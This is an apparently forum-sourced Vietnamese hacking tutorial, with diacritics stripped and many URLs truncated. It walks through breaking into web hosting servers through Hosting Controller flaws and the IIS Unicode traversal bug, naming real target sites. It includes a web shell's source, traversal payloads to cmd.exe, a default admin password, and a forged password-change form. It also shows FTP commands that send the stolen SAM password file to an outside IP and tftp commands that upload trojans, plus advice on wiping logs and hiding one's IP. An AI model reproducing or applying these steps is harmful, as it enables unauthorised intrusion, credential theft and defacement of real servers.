Cc bc Hack Server !

Cc bc ca hacker khi mun t nhp vo mt h thng my ch :

<Bc 1> FootPrinting : Cc mc tiu ca bc ny ch yu l nhng thng tin ban u
v server . Cng ngh bn cn s dng l : Open source search ( ngun my ch tm kim
) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( b phn ny ch yu
l kim tra v ngi ch server , DNS .. cu trc server cha th hin r y ) 1 s cng
c : UseNet , search engines ( cng c tm kim ) , Edgar Any Unix client ,
http://www.networksolutions.com/whois , http://www.arin.net/whois , dig , nslookup Is d , Sam spade
<Bc 2> Scanning : Phn ln cc server chu bung thng tin quan trng trong bc ny
, hy c gng tn dng bc ny trit bit cc port trn server , nghe ng d liu
. Cng ngh bn cn s dng l : Ping Sweep , TCP/UDP port Scan , Os Detection . Cc
cng c : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso ,
siphon .
<Bc 3> Enumeration : n bc ny , cc attacker bt u kim sot server s b , xc
nh cc account trn server , mc bo v ... Cng ngh bn cn s dng l : List user
accounts , List file share , Identify applications . Cc tool ph tr : null sessions ,
DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing vi
telnet , netcat , rpcinfo .
<Bc 4> Gaining access : Aha , c d liu kt hp tt c chng li . Chng ta
bt u n gn mc tiu . Hy nm chc c hi . 1 account c th b Crack . Cng ngh :
Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows
. Cc tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb ,
bind , IIS , .HTR/ISM.DLL
<Bc 5> Escalating privilege : Nu 1 account khng may mn no mt cp no
b crack bc trn , chng ta s c ci tn dng iu khin Server . Cng ngh :
Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin ,
sechole .
<Bc 6> Pilfering : Thng tin ly t bc trn ta nh v server v iu khin
server . Nu bc ny khng thnh cng , hy n bc <9> . Cng ngh : Evaluate
trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data ,
configuration files , Registry .
<Bc 7> Covering Tracks : H thng lun ghi nhn nhng hnh ng ca bn . Nu by
gi m kt thc , chc bn b tm ngay . y l bc cc k quan trng . XA LOG .
Cng ngh : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming
.
<Bc 8> Creating Backdoors : Cn phi hi , bn phi li 1 ci cng sau , ln sau c

vo th d hn ch . Nu khng thnh cng , quay li bc <4> xem li cc quyn ca

user bn s dng . Cng ngh : Creat rogue user accounts , schedule batch jobs , infect
startup files , plant remote control services , install monitoring mechanisms , replace apps
with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder ,
registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to
secadmin mail aliases login , fpnwclnt.dll
<Bc 9> Denial of Servies : 1 attacker khng thnh cng vi nhng g anh ta lm ...
h s tn dng nhng exploits code lm cho server ngng hot ng lun , gi l :
tn cng t chi dch v . Cng ngh : SYN flood , ICMP techniques , Identical src/dst
SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB )
DDoS . Tools ph tr : synk4 , ping of death , smurf land , latierra , teardrop , bonk ,
newtear , supernuke.exe , trinoo/TFN/stacheldraht
Nhng tool trn , bn c th search cc my tm kim nh http://www.google.com
Hack Server NT qua bug Hosting Controller :
Li HC l li ca phn mm Hosting Controller dng qun l server cung cp domain
v hosting cho khch hng thng c chy di Win2000/NT. Ti s Hack qua li HC
v s v d vi 1 server cha fix l server cha 38 site m c Hacker Forum
Hacked vo thng trc .
+ Li HC cho bn thc hin 1 dng lnh c cng ( C; D; E ) thm ch c A
ca server qua 1 site hoc trc tip bng ID ca server. Li HC thc cht l b li ca 4
file nm trong phn mm l : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ;
browsewebalizerexe.asp ; sqlbrowse.asp
Ti s vit cu trc ca lnh Hack vo server nh li 4 file ny :
..................
Trong HC c th l : admin ; advadmin; hostingcontroller
Li u tin ti gii thiu vi cc bn c tn Multiple security vulnerabilities. y l cc
on Script cho php bn duyt bt c file no trn Server :
http://www.victim.com/advwebadmin/stats/st...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/serv_u/s...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3

http://www.victim.com/advwedadmin/SQLServ/...epath=c:/&Opt=3
Trong Victim l Server b li HC m bn mun Hack
Ti s v d cc Hack server qua 1 site nm trong server (hay cn gi l Hack
local exploit)
VD : site ny b Hacker Forum hack : http://123hollywood.com/hf.htm
thanh Address bn nh 1 trong cc dng lnh sau :
http://123hollywood.com/admin/stats/statsb...=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servu...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlb...=c:\&Opt=3
Lc ny bn s vo c phn "Browser Directories". y l ton b cu trc ca
Website . Khi cc bn vo c bn trong ca C:\ bn thy c th mc websites
(i vi server ang th nghim ny, cn i vi cc server khc th n thng nm
D:/) .
Nu bn thy th OK . Bn hy vo trong v thy 1 lot cc website. Vi server chng
ta ang Hack trn bn s thy cc website c a vo cc th mc ring l theo vn.
Chng ta hy tm ti website m nh n chng ta vo dc server ny .
Bn hy vo 123web/123kinh/123hollywood.com/www/. Bn thy cc k n gin
ng khng .
Sau khi bit c ng dn ca site cn Hack th bn dng Script sau :
http://www.example.com/advwebadmin/folders...om&OpenPath=C:/
Thay example bng tn ca Server v testing bng tn trang Web mun Hack
V d : Bn ng k Website tn cuonglong ca FPT th ti FPT s cho bn mt ni
trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www
Mun Hack trang ny th bn nh Script nh trn :
http://www.ftp.com/advwebadmin/folders/fil...om&OpenPath=C:/
Vy l bn vo c cu trc th mc ca Web nhng lc ny bn ch quyn
upload 1 file no t cng ca bn ln site thi
Sau bn upload file ntdaddy.asp Website . V chy file ny trn Website ly
nhng file *.mdb v *.SAM v, y l file cha password, bn ch vic gii m ra
Vy l bn Hack c Website ri
By gi ti s hng dn cc bn cch upload v xo file trn cc site ny :
Ci ny th cng cc k n gin, bn hy xem mu sau :
http://www.eg.com/hc/folders/filemanager.a...om&OpenPath=C:/
trong testing l cc ng dn vo website m bn mun upload ; OK !
By gi th bn c th nghch thoi mi; Bn c th cho ton b site die trong

1 gi cng c hi hi ..
Cn 1 vi li na ca HC, trong c li cho php bn c kh nng khi to cho mnh 1
hosting trong server nh dng lnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cng nh trn, Victim l Server b li HC m bn mun Hack. V d l Website
http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosign...newwebadmin.asp
Mnh khi to ci ny, cc bc v xem : http://www.hackerforum.com/
Li ny cho php cho ng k free Domain. Bn hy ng ngay 1 Domain cho mnh ri
vo http://www.victim.com/AdvAmin/ Login vi vi Account va ng k. Sau khi
Login, bn click vo mc Directories trn menu ri vo Domain ca bn. Sau , bn hy
upload trang web ca mnh ln (ni upload di cng) v nh l tn trang web ng
di, ri click vo logout ( bn phi trn cng). Vy l ta i c na chng ng
Tip theo bn hy vo : http://www.victim.com/AdvAdmin/import/imp_...in.com\www
Bn hy thay ch "username" bng username lc u bn ng k Domain v thay ch
www.yourdomain.com bng a ch Domain m bn ng k v enter. V d ti ng k
1 Domain tn http://www.cuonglong.com/ vi username l ncviet Website
http://bigguy.ourweb.net/ th ti s g :
http://bigguy.ourweb.net/AdvAdmin/import/i...onglong.com/www
y l phn Import ca Website. N s hin ra 4 khung ng dn. By gi bn hy tm
trang web ca mnh khung th nht bn di v click vo n ri nhn nt "import".
By gi n copy trang Web ca bn vo khung th hai bn di. Ok, vy l bn
Hack xong ri . v d bn upload file cl.htm th ng dn Web ca bn s l :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Ch : http://www.victim.com/ s c thay bng Website b li hc. V c th trong qu
trnh hack, server s bt gi IP ca bn v vy bn nn ngy trang cho tht kho .
Bn c th tm rt nhiu server hin vn cn ang b li ny bng cch v
http://www.google.com/ ri nhp t kho "Hosting Controller" cho n Search.
Tip theo l mt li slash dot dot ca HC cho php ta thy c ng dn cc a v
cc th mc ca server v ta c th li dng n add (thm vo) mt ng dn DSN
ch ti mt a ch mi. khai thc li ny bn dng on code sau :
http://www.target.com/admin/dsn/dsnmanager....\..\
Ci th hai l chng ta c th thay i hon ton hay add vo th mc admin v thi hnh
nhng g chng ta mun. khai thc li ny ch cn a vo on code sau :
http://www.target.com/admin/import/imp_roo...tpPath=C:\
Bn c th nm quyn iu khin ton b cc file trong th mc (v c th l c C:\) v
thay i ty thch..
V li cui cng l default password, nu admin khng xo hay thay i user c tn l
AdvWebadmin (user default) th iu ny rt nguy him, bi v ta c th nm quyn iu

khin hon ton server (hay 1 phn) thng qua password default cho user ny l
"advcomm500349", sau th hack ch l vic d dng.
Tin th mnh cng ch thm cho cc bn cch ci trojan hoc 1 chng trnh DoS
(Denial of Service) vo server m ban vo c phc v cho cng vic Hack cho
mnh sau ny. Thng th khi Hack qua li HC bn rt kh c th ci thng chng trnh
vo C:/ nh li IIS c. Nhng chng ta vn c th ci 1 chng trnh nh chng ta
setup qua site nm trong server. Bn hy Upload 1 con trojan vo 1 site m chng ta
mun (Cch Upload nh trn ni). Sau y ti s ci 1 con reaccserver c chc nng
khi ci vo 1 server chng ta c th iu khin server bng my tnh nh mnh. Ti
upload file reaccserver.exe ln site http://123hollywood.com/ .
By gi mun ci t trojan ny vo trong server bn hy nh dng sau :
http://123hollywood.com/reaccserver.exe
Bn t hi lm sao m n c th ci vo c server m khng qua thng bo my ch.
ng, thng th cc phn mm qun l Hosting s thng bo my ch nhng thng
th ngi qun l server s b qua ch ny khi ci t HC Khi bn nh dng trn nu
thnh cng th IE s thng bo "server setup file full". Nu khng thnh cng n s bo
"Can't not Found". Lc ny bn hy nh li :
http://123hollywood.com/../../../reaccserver.exe
m bo s OK
Ch : khi setup file th PC ca bn cng s b ci t chng trnh . Bn
hy g n ra . Va ri mnh ci t trojan reaccserver ri. By gi bn hy dng phn
cn li ca chng trnh l file cp.exe. Chng ta c th Shutdown hoc Restart server kia.
Thng th server s mt t nht 3 pht khi ng li .
By gi mnh cng ni thm v li 1 s Website cc server ci t HC l thng cc
file upload.asp nm trong cc th mc ca Website. V vy mc d li HC c b fix th
chng ta cng Hack nh thng .
y l v d : http://www.aten2000.com/aspupload_samples_...rmAndScript.asp Bn
thy cha ! Mnh c th upload bt c file no m mnh mun . By gi mnh th tm cu
trc thng c1o ca 1 website ci HC nha. Bn hy vo y :
http://www.aten2000.com/cmd.asp xem ton b server vi cc lnh dir C:\ ; dir D:\ ;
dir E:\ v c file bng lnh type C:\..[ngdn].. ----> Ch : lnh ny c th c c
bt c file no .
Bn th tm trong m xem cng c nhiu lm .
khi cc bn vo c server, bn nn ci 1 file ASP c cng cho . y
l cu trc ca file cmd.asp :
----------------------------------------------------------------------<%@ Language=VBScript %>
<%
' --------------------o0o-------------------' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT

' ------------------------------------------Dim oScript

Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
------------------------------------------------------------------------------------NTDaddy c th download y: ntdaddy download
mt s server, khng r l do ta phi dng kt hp c cmdasp v ntdaddy mi hiu
qu.
khai thc, c 2 ngun thng tin cc k quan trng m ta cn quan tm trc tin, l
database ca HC v file sam._, ni cha tt c cc thng tin v cc host trn server.
File sam._ tht ra ch l bn backup, c th ko y , thng c lu winnt\repair.
Bn sam y c winnt\system32\config, nh b lock, rt kh ly. Sau khi ly c
sam._, cc bn dng l0pht hoc Lc3 (download http://www.l0pht.com/ hoc rt nhiu
trn net) crack.
Cn database ca cc host, thng lu tr th mc ci t HC, vd nh c:\program
files\advanced communitations\NT web hosting\...., l mt file access.
Cch download cc file nh th no!? c vi cch cho bn, nu bn bit c v tr lu
tr data cc host trn server (vd nh dng d:\users\www\democoun\www, a ch ny
thc cht khi browse trn browser s l http://www.democoun.com/ chng hn - y ch
l vd, cc bn phi t tm hiu folder c th, iu ny rt quan trng), bn c th dng
lnh copy, chp thng cc file ny vo th mc trn, sau download thng xung t

browser, nh www.democoun.com/sam._ .
Cch khc l dng ftp send file mnh mun n 1 a ch ftp m mnh bit, bng g
lnh trong cmdasp.asp hay nddaddy.asp (Cch ny ti c Kha cung cp thng tin). Tuy
nhin, ta ko th nhp v chy tng lnh tng tc ftp dng cc trnh ny c, bn phi
to 1 file text c cha danh sch cc lnh v yu cu ftp chy cc lnh . Cch to 1 filte
text, ta s dng lnh echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhp vo textbox lnh ca cmdasp v run, lnh ny s to mt file c:\dl.txt c
cha lnh "open 111.214.156.105". Gn tng t vi cc lnh khc, vd lnh sau s thm
1 dng vo sau lnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lu t cu lnh th 2 tr i, ta phi dng ">>" thay v ">". Cc bn lm tng t vi
cc lnh cn li, sao cho cc lnh trong dl.txt dng send ftp 1 file t nht phi c cc
lnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Cc lnh trn s send file c:\sam._ server bn ang hack n a ch anon
111.214.156.105.
Nh vy, bn to xong 1 script ftp file cn. By gi dng lnh sau thc thi cc
lnh trong dl.txt. Trc tin, bn chuyn v th mc cha dl.txt, dng lnh cd c:\, v
nhp lnh sau vo lnh cmdasp: "ftp -n -s:c:\dl.txt" v Run!
Nu thnh cng, tc l browser ko bo li v ch hin cc thng tin kt ni ftp...th file
sam._ c gi n a ch anon trn. Bn ch vic ftp vo download v. Sau
bn dng chng trnh L0phtCrack gii m file SAM
Lu l cc file bn copy v download xong, hy xa trnh b pht hin.
Mun tm cc Website b li Hosting Controller th bn vo http://www.google.com/ ri
g : "allinurl:/advadmin" (khng c du ngoc kp) nhn nt Google Search
Tha cc bn, nhng g mnh pht hin cng chng phi mi m g, chng qua l tn
dng cc li bit ca HC thi. Cng ging nh p dng l thuyt vo bi tp thi!
:smg]
Sau khi ng k 1 account vi ng dn:
http://www.victim.com/hc/autosignup/dsp_newwebadmin.asp
Th cc bn c quyn UPLOAD ln server cc trojan v backdoor. Nhng lm sao
active n c? Bn hy lm theo cc bc sau y:
1.Tm a ch IP ca my Server host trang web .

2.G ng dn ti trojan theo dng sau (ti ch bit cmdasp.asp v ntddady.asp nn ti

ci n ln):
http://d/?a-ch?-IP-Server/resadmi....asp.asp
(http://a-ch-IP-Server/restadmin/username-bn--ng-k/www/cmdasp.asp).
Tu theo Server m tn ng dn ny c th hi khc bit cht t. Bn c th dng 1
trong 5 bug cho xem cu trc th mc ca Server bit r rng chnh xc. Tng ng
vi a-ch-IP-Server l th mc WWWROOT trong Server.
Ti y th c 2 kh nng xy ra:
* Admin Server cho bn quyn to, xo, copy cc file trn my tnh. Th th OK ri, bn
ly cc file password v v crack n ra. Hoc lm g tu bn. :smg]
* Bn ch c th s dng cc lnh bnh thng nh dir, net user, netstat, ...Nhng khng
th xo v copy cc file. Lm sao by gi :sad] ? Chng ta hy qua bc 3.
(Nhn Admin hm ri mnh ni t l thnh cng c th t 60% cng l v l do . Nu
gp Admin no cn thn, n chng ghi tt c cc cng th mnh b tay. Lc chc
phi nh n cc bn thi.)
3. :shy] Rt may l bn c th khai thc bng cch khc l iu chnh tp tin Autoexec.bat
bng lnh ECHO trn CMDASP.ASP. By gi bn hy tm cc backdoor hoc trojan c
th t n ci t v n np trn server WinNT.Nu bn cha c c th vo
TLSECURITY.NET hoc GOOGLE.COM Search. Tip theo bn hy upload n ln
account ca bn. Sau tin hnh sa i ni dung ca tp tin AUTOEXEC.BAT ( trong
th mc C:\ ) bng cch dng lnh ECHO trong cmdasp.asp thm vo dng lnh cng chnh l path(ng dn) n tp tin thi hnh ca Backdoor (hay trojan) m bn
upload ln. Xong!!
:smoking]
By gi th bn t c mc ch t nhp vo trang web ri , n mng chin
thng di ch .
Thnh Cng Hay Tht Bi cn li l ph thuc vo k nng v kinh nghim che giu tung
tch v hack ca bn .
Chc may mn nh!!
Nu thiu st (mnh ngh nht nh l c) th cc bn sa cha dm mnh nh, cm n
nhiu!!
Chc vui v!!
Bye
--------------------------------------------------------------------------------------------------Nu Hosting Controller cha patch th khng nn dng cch ny bi t l thnh cng ca
n rt thp,theo ti cha chc c 6% ch khng phi 60% na.y l nhng iu
kin buc phi c nu mun s dng cch trn:
-Th nht : phi tm c real IP ca server:real IP ca server l IP tr vo wwwroot
trong a C (mc nh l nh vy).1 server config rt nhiu IP nht l server dng
host,nh vy vic tm c real IP l rt kh khn,ngay c khi vo c server ri

th vic tm ra real IP cng l c 1 vn ch khng ni l lng vng ngoi server .

-Th hai : Th mc web ca resadmin (th mc cha web c to t quyn ca
resadmin m ta li dng li HC to account) phi nm trong wwwroot m real IP
tr ti,chng hn th mc web ca resadmin phi nm ti
C:\inetpub\wwwroot\resadmin\viethacker\viethacker.net\www .Trn thc t th rt t
trng hp nh vy bi cc hosting thng hay web user directory 1 ch khc hoc
1 a khc m bo an ton.
-Th ba : trong trng hp tm c real IP v th mc web ca resadmin t trong
wwwroot m real IP tr ti th cn phi cn iu kin l wwwroot khng b hn ch
quyn i vi web user c ngha l web user c th truy cp vo cc file v subforder ca
wwwroot t real IP.
-Trong trng hp hn hu c 3 iu kin trn v vo c server nhng cha
ly c quyn Admin th cng kh khai thc bi b nhiu restrict (hn ch t pha server
v nhiu trojan ch hiu qu khi c chy di quyn Admin,cn y chng ta ch vo
server vi quyn ca web user.Hy tm cch ly c quyn Admin khi ang vo server
vi t cch l 1 web user.
File /accounts/updateuserdesc.asp khng kim tra li logged in user khi submit, do vy
bng vic sa li file ny chng ta c th i password ca bt k mt user no
Cch lm :
Dnh cho cc bn to c webadmin user, cn ai to c reseller admin th s
n gin hn (t nghin cu thm nh).
Trc tin bn lu file sau thnh file updateuserdesc.asp trn cng ca bn:
updateuserdesc.asp
<!--Session Variable Names Reference-->
<!-- #inlcude file="adovbs.inc"-->
<html>
<head>
<title>Update User Information</title>
<META HTTP-EQUIV="Expires" CONTENT="-1">
<META HTTP-EQUIV="Pragma" CONTENT="No-Cache">
<script type="text/javascript"
src="http://www.yourvictim.com/admin/css/jslib.js"></script>
<link rel="stylesheet" type="text/css"
href="http://www.yourvictim.com/admin/css/tbset.css">
<link rel="stylesheet" type="text/css"
href="http://www.yourvictim.com/admin/css/tbset.css">
<script language="JavaScript">

function CheckEntries(frm)
{
var flag;
Empty = false;
if (frm.PassCheck.checked )
{
if (frm.Pass1.value == "" )
{
alert("The password or confirm password are empty");
frm.Pass1.focus();
return false;
}
}

frm.action="http://www.yourvictim.com/admin/accounts/AccountActions.asp?ActionTyp
e=UpdateUser&User
Name="+frm.UserName;
frm.submit();
}
function GoBack(frm)
{
frm.action="AccountManager.asp";
frm.submit();
}
</script>
</head>
<body>
<form name="newUserForm"
action="http://www.yourvictim.com/admin/acounts/AccountActions.asp?ActionType=U
pdateUser"
method="post" onSubmit="return CheckEntries(newUserForm)">
<center><h2>Update User Account</h3><p></center>
<center>
<table BORDER="0" align="center" CELLSPACING="1" CELLPADDING="1"
width="60%" class="trhead">
<tr>

<td>Alter</td>
<td>User Information</td>
</tr>
</table>
<table align="center" class="trbody" width="60%">
<tr>
<td>
User Name:
</td>
<td>
killuser
</td>
<input type="hidden" name="UserName" value="killuser">
</tr>
<tr>
<td>
Full Name:
</td>
<td>
<input name="FullName" align="LEFT" tabindex="2" title="New Full Name"
value="killuser">
</td>
</tr>
<tr>
<td>
Description
:
</td>
<td>
<input name="Description" align="LEFT" tabindex="3" title="Description" value="">
</td>
</tr>
<tr>
<td>
Change Password Also:
</td>
<td>
<input type="checkbox" name="PassCheck"

value="TRUE">&nbsp;&nbsp;&nbsp;&nbsp;
<a
href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/chang
e_password.h
tm')"><img src="..\images\help.gif" border="0" value="Help"></a>
</td>
</tr>
<tr>
<td>
New Password&nbsp;
:&nbsp;
</td>
<td>
<input type="password" name="Pass1" align="LEFT" tabindex="4" title="Password">
</td>
</tr>
<tr>
<td>
Account Disabled:
</td>
<td>
<input type="checkbox" name="AccountDisabled" align="LEFT" tabindex="6"
title="Account
Disabled" >&nbsp;&nbsp;&nbsp;&nbsp;
<a
href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/disabl
e_account.h
tm')"><img src="..\images\help.gif" border="0" value="Help"></a>

</td>
</tr>
<tr>
<td>
User Cannot Change password:
</td>
<td>
<input type="checkbox" name="UserChangePassword" align="LEFT" tabindex="7"
title="Change
Password" >
</td>
</tr>
</table>
<input type="hidden" name="ActionType" value="AddUser" title="AddUser">
<table WIDTH="60%" ALIGN="center" CELLSPACING="1" CELLPADDING="1"
class="trhead">
<tr>
<td><input type="button" class=butn name="Update" value="Update User"
align="MIDDLE" tabindex="7" title="Submit" onclick="return
CheckEntries(this.form)"></td>
<td><input type="button" class=butn name="Cancel" value="Back"
align="MIDDLE" tabindex="7" title="Submit" onclick="return
GoBack(this.form)"></td>
</tr>
</table>
</form>
</body>
</html>

Ch nh i li www.yourvictim.com v killuser (username ca user m bn mun

i).
Sau vo www.yourvictim.com v login vo bng webadmin account ca bn. Sa url
address thnh c:\your dir\updateuserdesc.asp , trang updateuser ca hc s hin ln vi
username = killuser, bn ch vic check vo "Change Password Also" v nhp password

mi vo "New password", ri Submit ==> DONE

Kim tra li bng cch login vo vi user "killuser". Bn c th tm tn cc user bng
cch duyt cc th mc con trong web root ca hc, v tn th mc chnh l tn user.
Ch l vic sa password s b pht hin ra ngay khi user tht login vo, do khng
nn lm dng.
IIS Server
Chao anh em! Hom nay toi lai tiep tuc gioi thieu voi anh em mot ky thuat hack vao IIS
Server nua. Tai lieu nay khong phai cua em, ma em chi di "hoc lom" duoc tren Internet va
da thuc hanh roi. Thay hay hay len muon cung anh em trao doi.
Buoc 1:
Anh em can mot file Unicode duoi dang Perl (*.pl) va mot chuong trinh Perl.
Buoc 2:
Sau khi da chuan bi xong. Anh em ra DOS go:
perl unicode.pl
Se thay Host: (go dia chi Website ma anh em muon xac dinh xem co phai la IIS khong)
Port: Go 80.
.....
Cho mot chut neu la IIS no se tim cac Bug tren IIS. Trong file Unicode.pl co chua khoang
20 Bug.
1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14]
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/
c+
[15] /cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16]
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[17]
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+
[18]
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19]
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20]
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+
Buoc 3:
Anh em mo Browser go dia chi trang Web va copy phan bug ma Unicode phat hien vao.
VD: Toi go
perl unicode.pl
Host: http://www.tnh.com.vn
Port: 80
Sau khi no Scan thi thay cai Host nay co 2 Bug 14 va 18. Toi co the su dung mot trong 2
bug nay. Chang han toi su dung Bug 18.
Toi mo Browser, trong thanh Add toi go:
http://www.tnh.com.vn/_vti_bin/..%c0%af..%...m32/cmd.exe?/c+
Vay la ban da dot nhap duoc vao IIS roi day. Cac ban co the truy cap vao o cung cua IIS
nhu la o cung cua minh vay. Cac ban co the tao, xoa, di chuyen, thu muc, file, up, down
va run cac file tren Server do...Muon vay cac ban chi can dung cac lenh cua DOS thoi.
Dung noi voi toi la cac ban khong biet lenh Dos nha.
VD: De doc o C----Cac ban go dir+c:\----Tuong ung voi dong lenh o Browser.
http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\
Tuong tu co cac lenh nhu: md, rd, ren...Cu ngam lai sach DOS la OK het a.
P/S: Thong thuong trang Web thuong o inetpub\wwwroot
Anh em chi can dzo day thay File index.html cua no bang index.html cua minh. Vay la
OK! Website do bi hack roi day. Nho dung cac chuong trinh de che dau IP cho an toan
nha. Khong la boc lich nhu choi day. Duoi day la mot so Website dung IIS
http://www.psv.com.vn/
http://www.tnh.com.vn/
http://www.mekonggreen.com.vn
http://www.thaiweb.co.th/
http://www.khaitri.com.vn/

Cach xac dinh Bug va cach dot nhap vao o cung cua Server do em da de cap voi anh em o
bai viet truoc roi nha. Cu cho la anh em da dot nhap duoc vao o cung cua Site do roi di.
De Down file anh em dung lenh type (xem noi dung file cua DOS). Voi cac file *.html,
*.txt thi no se View noi dung cho anh em xem, con voi cac file khong View duoc thi no
se hien len cua so yeu cau Save to disk (khong phai Server nao cung lam duoc nhu vay
dau, con tuy).
VD: em muon down mot file o www.tnh.com.vn (em thi chi quen thuc tap bang cai nay
thoi a). Em go
http://www.tnh.com.vn/_vti_bin/..%c0%af..%...ype+c:\ten file muon Down.
Anh em dung len qua lam dung cung nhu tan pha qua dang cac site.
P/S: Hack IIS thi duoc roi, nhung di dao tren Iiternet em thay da so cac site thuong dung
Apache Server. Em dang tap Hack Apache Server. Em hien dang co mot tai lieu day hack
Apache Server, em doc thay kha de hieu....Nhung khi thuc hanh thi mai khong duoc,
khong biet la tai Server do Patch roi hay la tai em ngu. Anh nao biet cach hack Apache
lam on huong dan anh em voi....Website cua bon FPT cung dung IIS, nhung rat tiec la no
da Patch roi.
UP FILES TRONG IIS SERVER

Em se gioi thieu tiep voi anh em cach Up file len IIS da bi bug. Bai nay khong phai do
em viet, em chi di hoc lom thoi, thay hay thi post cho anh em thoi a. Dau tien anh em can
tai doan Code (lai ten la Unicode) tu dia chi: http://www.cners.com/tools/unicode.zip

Chay file tftpd32.exe ( hoac tftpd.exe toi quen roi ) truong hop ko ro rang anh em cu
rename sao cho co du 2 file tftpd.exe va tftpd32.exe vay .
Chay file nay ,sau do xem so IP va ghi lai .
Dung notepad mo file uniexe.pl ra, sua cho xxx.xxx.xxx.xxx thanh so IP vua co tu tftpd .
Sua cac thong so tren cung hang voi cho xxx.xxx.xxx.xxx vua dien :
+thay "GET ncx99.exe" thanh "GET yyy.zzz" voi yyy.zzz la mot file nam tren o cung
cua anh em
+thay phan C:\inetpub\scripts bang duong dan den thu muc anh em muon upload file xem

vd sau de ro hon :
#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i 202.162.63.126 GET index.htm c:\\inetpub\\wwwroot\\index.htm";
---> trong VD tren toi da copy 1 file trong thu muc C:\ cua toi ( co IP la 202.162.63.126 )
toi C:\inetpub\wwwroot\ cua may chu bi dinh unicode bug.
Sau do anh em ra ngoai DOS, go
Perl Ip cua may chu:port
VD: perl uniexe.pl 202.162.45.78:80
Neu khong co van de gi thi file do da duoc Up len server roi do.
Luu y: Ngoai up cac file *.html, anh em co the update cac trojan remote access hay la cac
chuong trinh getadmin cho Winnt de doat quyen admin roi tung hoanh trong may chu
nay.
De chay file tren Server, ra Dos go:
Perl uniexe.pl ip cua trang web:port ten file can run (co ca duong dan).
P/S: Khong phai bat cu may chu nao cung cho phep anh em tao, di chuyen, hay run tren
no dau. Tuy thuoc vao Admin thoi. Mot so anh em co noi rang khi Scan khong thay phat
hien Bug nao, chac la no Patch het tron roi. Anh em can phai di kiem Website khac
thoi....Theo em biet thi cac Website cua Thailand hay xai IIS lam. Em dang thuc hanh len
cung chang can nhieu Server lam, hien dang thuc hanh tren http://www.tnh.com.vn/
Anh em nao can thi co the dzo luon o cung cua no thuc hanh bang cach copy doan Code
sau vao Add trong Browser cua anh em.
http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\
